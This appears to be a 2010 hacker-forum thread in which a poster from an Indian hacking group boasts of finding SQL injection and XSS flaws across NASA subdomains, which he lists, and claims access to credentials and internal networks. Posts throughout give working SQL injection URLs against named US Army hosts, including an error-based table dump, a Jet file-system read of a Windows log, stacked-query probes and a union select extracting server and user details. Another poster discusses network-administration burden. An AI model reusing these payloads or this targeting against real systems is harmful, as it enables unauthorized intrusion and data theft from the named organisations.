Jaijeya
I am exploring NASA for SQL injections and XSS since mid January and to my wonder every 3 minutes I've discovered a new SQL injection vulnerability or XSS.
The SQL injection allowed me to access user credentials, File System and internal networks and precious information from their servers.

The database servers deployed by them vary to nearly all type of servers on different systems like Sybase, Oracle, MySQL, SQL server, MS-Access, NoSQL etc.

Some of vulnerable NASA subdomains are:


www.jpl.nasa.gov
pds.jpl.nasa.gov
ssd.jpl.nasa.gov
robotics.nasa.gov
ppj-web-3.jpl.nasa.gov
software.gsfc.nasa.gov
sbir.nasa.gov
science.gsfc.nasa.gov
www.igpp.ucla.edu
directreadout.sci.gsfc.nasa.gov
aerospacescholars.jsc.nasa.gov
www.leadership.nasa.gov
sdo.gsfc.nasa.gov
------
------
------ and so many.
more information is available on Orkut's following community:

http://www.orkut.co.in/Main#CommMsgs?cmm=25319870&tid=5428640088652321772&na=4&nst=28&nid=25319870-5428640088652321772-5431980662675543020


and Penetration pictures can be viewd at:
http://www.orkut.co.in/Main#Album?uid=12341139053341897468&aid=1264214598


"vinnu"
LOX (Legion Of Xtremers)INDIA

Check following error based injection:

https://www.dms.army.mil/acro_list.cfm?startrow=30&orderby=cast((select+top+1+substring(name,1,600)+from+sysobjects+order+by+NEWID())+as+int)&sort=&clear=true

Yes this has been the case for ages on their networks, apparently they simply gave up administrating tons of boxes all over the place, somehow I can relate.

Yes thats right.
I think now they should prepare a virus like in Terminator movie to administer their huge networks automatically and that can learn and identify the problems and fix them automatically.

This is MS Jet database, check the file system access using SQL injection:

http://www.mepcom.army.mil/publications/results.asp?topic=Forms'+union+select+1,File,Message,Line,Time,6,Tag,8,9,10,11+from+[TEXT;DATABASE=c:%5Cwindows;HDR=YES;FMT=Delimited].[setuplog.txt]'&pubNo=&date1=&date2=&pubDesc=

Yeah, most folks have enough trouble administrating 1 box (their own) let alone thousands of boxes. There is no way you can secure them all effectively. Imagine the horror of a patch schedule for all those boxes. It would imply they need at least 1 guy administrating 10 to 20 boxes or they loose track. That's a lot of guys, all working in different departments, different skills, no web application skills whatsoever. So I'm guessing they made the trade-of with a security policy where sensitive data is in different more tightly monitored clusters.



Edited 2 time(s). Last edit at 02/15/2010 08:29AM by rvdh.

Yeah thats right.
Somewhere I read that Pentagons Cyber Security Budget is over 100 million$.
This is a great amount.
Another thing is that actually we talk about home PCs can be used to attack as zombie to other networks, likewise these system's can also be used for further attacks or exploration of their internal networks.
In some of NASA cases same was true, the compromised database allowed me to further enumerate internal network.

Actually they are doing what is taught are preliminary avoiding terms during learning secure software development. I mean they are employing security at perimeter at some places like HTTP level and not at the application level.
Like in some cases, u can grab information of internal systems or server itself by causing something unexpected like any error and the applications are throwing huge heaps of information enough for an attacker whereas the http filter doesn't stop such outward flow, so at those networks only the invard traffic is analysed.

Well all in all, we are just curious people and can just attempt ourself to know where is our taxes are actually being used up and how effective.
There is no opposition (of assembly off course) to debate on this or stop this useless expending.

A blind SQL injection in Pentagon server:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=59order+by+13
The stacked queries are also working check two cases below if query returns properly it means db engine is Microsoft SQL server:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@version
and now test this:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@veion





"vinnu"
LOX (Legion Of XCtremers)INDIA



Edited 1 time(s). Last edit at 02/16/2010 11:31AM by vinnu.

And now a perfect query:

http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=-5union+all+select+1,@@version,user_name(),suser_name(),@@servername,6,7,8,9,10,11,12,13